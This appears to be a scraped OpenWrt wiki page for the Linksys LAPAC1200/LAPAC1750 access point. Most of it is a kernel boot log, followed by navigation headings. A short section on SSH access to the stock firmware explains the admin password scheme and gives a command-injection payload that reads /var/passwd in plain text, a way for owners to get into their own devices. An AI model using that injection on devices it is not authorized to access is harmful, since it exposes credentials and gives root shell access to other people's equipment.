0.000000] Kernel command line: console=ttyS0,115200n8 rootfstype=squashfs,jffs2 [ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes, linear) [ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes, linear) [ 0.000000] Writing ErrCtl register=00000000 [ 0.000000] Readback ErrCtl register=00000000 [ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 32768 [ 0.000000] mem auto-init: stack:off, heap alloc:off, heap free:off [ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1 [ 0.000000] RCU Tasks Trace: Setting shift to 0 and lim to 1 rcu_task_cb_adjust=1 rcu_task_cpu_ids=1. [ 0.000000] NR_IRQS: 51 [ 0.000000] CPU clock: 720.000 MHz [ 0.000000] clocksource: MIPS: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 5309056796 ns [ 0.000001] sched_clock: 32 bits at 360MHz, resolution 2ns, wraps every 5965232126ns [ 0.008354] Calibrating delay loop... 358.80 BogoMIPS (lpj=1794048) [ 0.075007] pid_max: default: 32768 minimum: 301 [ 0.089834] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes, linear) [ 0.097639] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes, linear) [ 0.115264] Memory: 118840K/131072K available (6747K kernel code, 599K rwdata, 1524K rodata, 1232K init, 229K bss, 11680K reserved, 0K cma-reserved) [ 0.133093] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns [ 0.143610] futex hash table entries: 256 (order: 0, 3072 bytes, linear) [ 0.157797] pinctrl core: initialized pinctrl subsystem [ 0.166713] NET: Registered PF_NETLINK/PF_ROUTE protocol family [ 0.187418] clocksource: Switched to clocksource MIPS [ 0.203820] NET: Registered PF_INET protocol family [ 0.209273] IP idents hash table entries: 2048 (order: 2, 16384 bytes, linear) [ 0.217798] tcp_listen_portaddr_hash hash table entries: 1024 (order: 0, 4096 bytes, linear) [ 0.226817] Table-perturb hash table entries: 65536 (order: 6, 262144 bytes, linear) [ 0.236125] TCP established hash table entries: 1024 (order: 0, 4096 bytes, linear) [ 0.244316] TCP bind hash table entries: 1024 (order: 1, 8192 bytes, linear) [ 0.251861] TCP: Hash tables configured (established 1024 bind 1024) [ 0.259291] MPTCP token hash table entries: 512 (order: 1, 6144 bytes, linear) [ 0.267230] UDP hash table entries: 256 (order: 0, 4096 bytes, linear) [ 0.274251] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes, linear) [ 0.282472] NET: Registered PF_UNIX/PF_LOCAL protocol family [ 0.288582] PCI: CLS 0 bytes, default 32 [ 0.296420] workingset: timestamp_bits=14 max_order=15 bucket_order=1 [ 0.304811] squashfs: version 4.0 (2009/01/31) Phillip Lougher [ 0.311064] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc. [ 0.328251] pinctrl-single 1804002c.pinmux: 544 pins, size 68 [ 0.340660] Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled [ 0.348452] printk: legacy console [ttyS0] disabled [ 0.354306] 18020000.uart: ttyS0 at MMIO 0x18020000 (irq = 11, base_baud = 2500000) is a 16550A [ 0.363657] printk: legacy console [ttyS0] enabled [ 0.363657] printk: legacy console [ttyS0] enabled [ 0.373866] printk: legacy bootconsole [early0] disabled [ 0.373866] printk: legacy bootconsole [early0] disabled [ 0.395958] 5 fixed-partitions partitions found on MTD device spi0.0 [ 0.402471] Creating 5 MTD partitions on "spi0.0": [ 0.407336] 0x000000000000-0x000000040000 : "u-boot" [ 0.414865] 0x000000040000-0x000000050000 : "u-boot-env" [ 0.421810] 0x000000050000-0x0000007f0000 : "fwconcat0" [ 0.428499] 0x0000007f0000-0x000000800000 : "art" [ 0.434948] 0x000000800000-0x000000f00000 : "fwconcat1" [ 0.837924] ag71xx-legacy 19000000.eth: connected to PHY at mdio.0:00 [uid=004dd072, driver=Qualcomm Atheros AR8035] [ 0.849298] eth0: Atheros AG71xx at 0xb9000000, irq 4, mode: rgmii-id [ 0.856255] i2c_dev: i2c /dev entries driver [ 0.862732] NET: Registered PF_INET6 protocol family [ 0.872929] Segment Routing with IPv6 [ 0.876747] In-situ OAM (IOAM) with IPv6 [ 0.880911] NET: Registered PF_PACKET protocol family [ 0.886088] 8021q: 802.1Q VLAN Support v1.8 [ 0.907878] PCI host bridge to bus 0000:00 [ 0.912054] pci_bus 0000:00: root bus resource [mem 0x10000000-0x11ffffff] [ 0.919080] pci_bus 0000:00: root bus resource [io 0x0000] [ 0.924739] pci_bus 0000:00: No busn resource found for root bus, will use [bus 00-ff] [ 0.932857] pci 0000:00:00.0: [168c:003c] type 00 class 0x028000 PCIe Endpoint [ 0.940251] pci 0000:00:00.0: BAR 0 [mem 0x00000000-0x001fffff 64bit] [ 0.946838] pci 0000:00:00.0: ROM [mem 0x00000000-0x0000ffff pref] [ 0.953210] pci 0000:00:00.0: supports D1 D2 [ 0.958707] pci_bus 0000:00: busn_res: [bus 00-ff] end is updated to 00 [ 0.965454] pci 0000:00:00.0: BAR 0 [mem 0x10000000-0x101fffff 64bit]: assigned [ 0.972932] pci 0000:00:00.0: ROM [mem 0x10200000-0x1020ffff pref]: assigned [ 0.980548] Concatenating MTD devices: [ 0.984368] (0): "fwconcat0" [ 0.987295] (1): "fwconcat1" [ 0.990265] into device "virtual_flash" [ 0.994192] 2 fixed-partitions partitions found on MTD device virtual_flash [ 1.001540] Creating 2 MTD partitions on "virtual_flash": [ 1.007032] 0x000000000000-0x000000ea0000 : "firmware" [ 1.020645] 0x000000010000-0x000000ea0000 : "uimage" [ 1.027163] 2 uimage-fw partitions found on MTD device uimage [ 1.033060] Creating 2 MTD partitions on "uimage": [ 1.037939] 0x000000000000-0x0000002b0000 : "kernel" [ 1.044159] 0x0000002b0000-0x000000e90000 : "rootfs" [ 1.050488] mtd: setting mtd8 (rootfs) as root device [ 1.055689] 1 squashfs-split partitions found on MTD device rootfs [ 1.062013] 0x000000690000-0x000000e90000 : "rootfs_data" [ 1.073695] clk: Disabling unused clocks [ 1.085053] VFS: Mounted root (squashfs filesystem) readonly on device 31:8. [ 1.096448] Freeing unused kernel image (initmem) memory: 1232K [ 1.102500] This architecture does not have kernel memory protection. [ 1.109056] Run /sbin/init as init process [ 1.766159] init: Console is alive [ 1.770047] init: - watchdog - [ 3.063764] kmodloader: loading kernel modules from /etc/modules-boot.d/* [ 3.146534] gpio_button_hotplug: loading out-of-tree module taints kernel. [ 3.156705] kmodloader: done loading kernel modules from /etc/modules-boot.d/* [ 3.174584] init: - preinit - [ 7.047452] random: crng init done Press the [f] key and hit [enter] to enter failsafe mode Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level [ 10.909210] eth0: link up (1000Mbps/Full duplex) [ 12.101711] jffs2: notice: (472) jffs2_build_xattr_subsystem: complete building xattr subsystem, 32 of xdatum (28 unchecked, 4 orphan) and 39 of xref (4 dead, 0 orphan) found. [ 12.120512] mount_root: switching to jffs2 overlay [ 12.128900] overlayfs: upper fs does not support tmpfile. [ 12.141311] urandom-seed: Seeding with /etc/urandom.seed [ 12.264110] eth0: link down [ 12.282003] procd: - early - [ 12.285228] procd: - watchdog - [ 12.916217] procd: - watchdog - [ 12.920685] procd: - ubus - [ 13.060916] procd: - init - Please press Enter to activate this console. [ 14.505994] kmodloader: loading kernel modules from /etc/modules.d/* [ 15.905715] Loading modules backported from Linux version v6.18-0-g7d0a66e4b [ 15.912922] Backport generated by backports.git 4d44cef [ 16.666282] urngd: v1.0.2 started. [ 16.753848] PPP generic driver version 2.4.2 [ 16.778507] NET: Registered PF_PPPOX protocol family [ 16.871053] ath10k 6.15 driver, optimized for CT firmware, probing pci device: 0x3c. [ 16.918131] ath10k_pci 0000:00:00.0: enabling device (0000 -> 0002) [ 16.924667] ath10k_pci 0000:00:00.0: pci irq legacy oper_irq_mode 1 irq_mode 0 reset_mode 0 [ 20.952379] ath10k_pci 0000:00:00.0: qca988x hw2.0 target 0x4100016c chip_id 0x043202ff sub 0000:0000 [ 20.961818] ath10k_pci 0000:00:00.0: kconfig debug 0 debugfs 1 tracing 0 dfs 1 testmode 0 [ 20.972166] ath10k_pci 0000:00:00.0: firmware ver 10.1-ct-8x-__fW-023-23ea9f8e api 2 features wmi-10.x,has-wmi-mgmt-tx,mfp,peer-fixed-rate,txstatus-noack,wmi-10.x-CT,ratemask-CT,txrate-CT,get-temp-CT,tx-rc-CT,cust-stats-CT,retry-gt2-CT,txrate2-CT,beacon-cb-CT,wmi-block-ack-CT crc32 42c82ae5 [ 21.684219] ath10k_pci 0000:00:00.0: board_file api 1 bmi_id N/A crc32 bebc7c08 [ 22.660198] ath10k_pci 0000:00:00.0: 10.1 wmi init: vdevs: 16 peers: 127 tid: 256 [ 22.676353] ath10k_pci 0000:00:00.0: wmi print 'P 128 V 8 T 410' [ 22.682725] ath10k_pci 0000:00:00.0: wmi print 'msdu-desc: 1424 sw-crypt: 0 ct-sta: 0' [ 22.690894] ath10k_pci 0000:00:00.0: wmi print 'alloc rem: 23808 iram: 38144' [ 22.736706] ath10k_pci 0000:00:00.0: htt-ver 2.1 wmi-op 2 htt-op 2 cal nvmem max-sta 128 raw 0 hwcrypto 1 [ 22.754408] ath10k_pci 0000:00:00.0: NOTE: Firmware DBGLOG output disabled in debug_mask: 0x10000000 [ 22.960754] ieee80211 phy1: Atheros AR9550 Rev:0 mem=0xbdc2431a, irq=13 [ 22.997847] kmodloader: done loading kernel modules from /etc/modules.d/* [ 37.967829] br-lan: port 1(eth0) entered blocking state [ 37.973184] br-lan: port 1(eth0) entered disabled state [ 37.978580] ag71xx-legacy 19000000.eth eth0: entered allmulticast mode [ 37.985466] ag71xx-legacy 19000000.eth eth0: entered promiscuous mode [ 40.029268] eth0: link up (1000Mbps/Full duplex) [ 40.034032] br-lan: port 1(eth0) entered blocking state [ 40.039390] br-lan: port 1(eth0) entered forwarding state [ 44.108259] ath10k_pci 0000:00:00.0: 10.1 wmi init: vdevs: 16 peers: 127 tid: 256 [ 44.124386] ath10k_pci 0000:00:00.0: wmi print 'P 128 V 8 T 410' [ 44.130754] ath10k_pci 0000:00:00.0: wmi print 'msdu-desc: 1424 sw-crypt: 0 ct-sta: 0' [ 44.138934] ath10k_pci 0000:00:00.0: wmi print 'alloc rem: 23808 iram: 38144' [ 44.186484] ath10k_pci 0000:00:00.0: pdev param 0 not supported by firmware [ 44.214183] ath10k_pci 0000:00:00.0: rts threshold -1 [ 44.244244] br-lan: port 2(phy0-ap0) entered blocking state [ 44.249972] br-lan: port 2(phy0-ap0) entered disabled state [ 44.255675] ath10k_pci 0000:00:00.0 phy0-ap0: entered allmulticast mode [ 44.262722] ath10k_pci 0000:00:00.0 phy0-ap0: entered promiscuous mode [ 48.367751] br-lan: port 3(phy1-ap0) entered blocking state [ 48.373434] br-lan: port 3(phy1-ap0) entered disabled state [ 48.379179] ath9k 18100000.wmac phy1-ap0: entered allmulticast mode [ 48.385847] ath9k 18100000.wmac phy1-ap0: entered promiscuous mode [ 58.184286] br-lan: port 3(phy1-ap0) entered blocking state [ 58.190004] br-lan: port 3(phy1-ap0) entered forwarding state [ 59.769009] br-lan: port 2(phy0-ap0) entered blocking state [ 59.774717] br-lan: port 2(phy0-ap0) entered forwarding state

There is a hidden page allowing to toggle on SSH. After logging in, navigate directly to /ssh.htm, toggle SSH on and save the change. The SSH server is started immediately. As the server is an old version of OpenSSH, it uses the deprecated ssh-rsa hostkey algorithm that is disabled by default on current OpenSSH versions. This is indicated by the following error message when you try to connect:

Unable to negotiate with <host> port 22: no matching host key type found.
Their offer: ssh-rsa,ssh-dss

Enable the obsolete algorithm to allow a connection anyway:

ssh -oHostkeyAlgorithms=+ssh-rsa admin@<host>

The password for the admin user is generated based on the password set in the web interface and the primary MAC address of the device. The format is as follows:

AABBCCpasswordDDEEFF

Where AABBCC are the first and DDEEFF are the last three octets of the MAC address with uppercase letters and without any delimiter. So for the MAC address 58:ef:68:01:23:ab and password `admin` the full password would be 58EF68admin0123AB.

The password can be read in plain text from /var/passwd by injecting the command as detailed above:

' || S=${PWD%u*} && ${S}bin${S}cat ${S}var${S}passwd #

The output would then look like similar to this:

...
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
sshd::99:99:Nobody:/:/sbin/sh
admin:58EF68admin0123AB:0:0:root:/:/bin/sh
...

Unsupported devices, ath79, qca9558, 16flash, 128ram, 1port, GigabitEthernet, U-Boot, mips, 1core, no switch, wlan, internalantenna, serial, 12v powered, PoE, ap135

Unsupported devices ath79 qca9558 16flash 128ram 1port gigabitethernet u-boot mips 1core no switch wlan internalantenna serial 12v powered PoE ap135

Linksys LAPAC1200/LAPAC1750[C]

OpenWrt support

Hardware highlights

Installing OpenWrt

From Stock Firmware Web Interface

From Bootloader Recovery

Debricking

Specific configuration

Network interfaces

Buttons

Hardware

Info

Flash Layout

Photos

Opening the case

Serial

JTAG

OEM Bootlogs

OpenWrt bootlog

Notes

SSH Access to Stock Firmware

Tags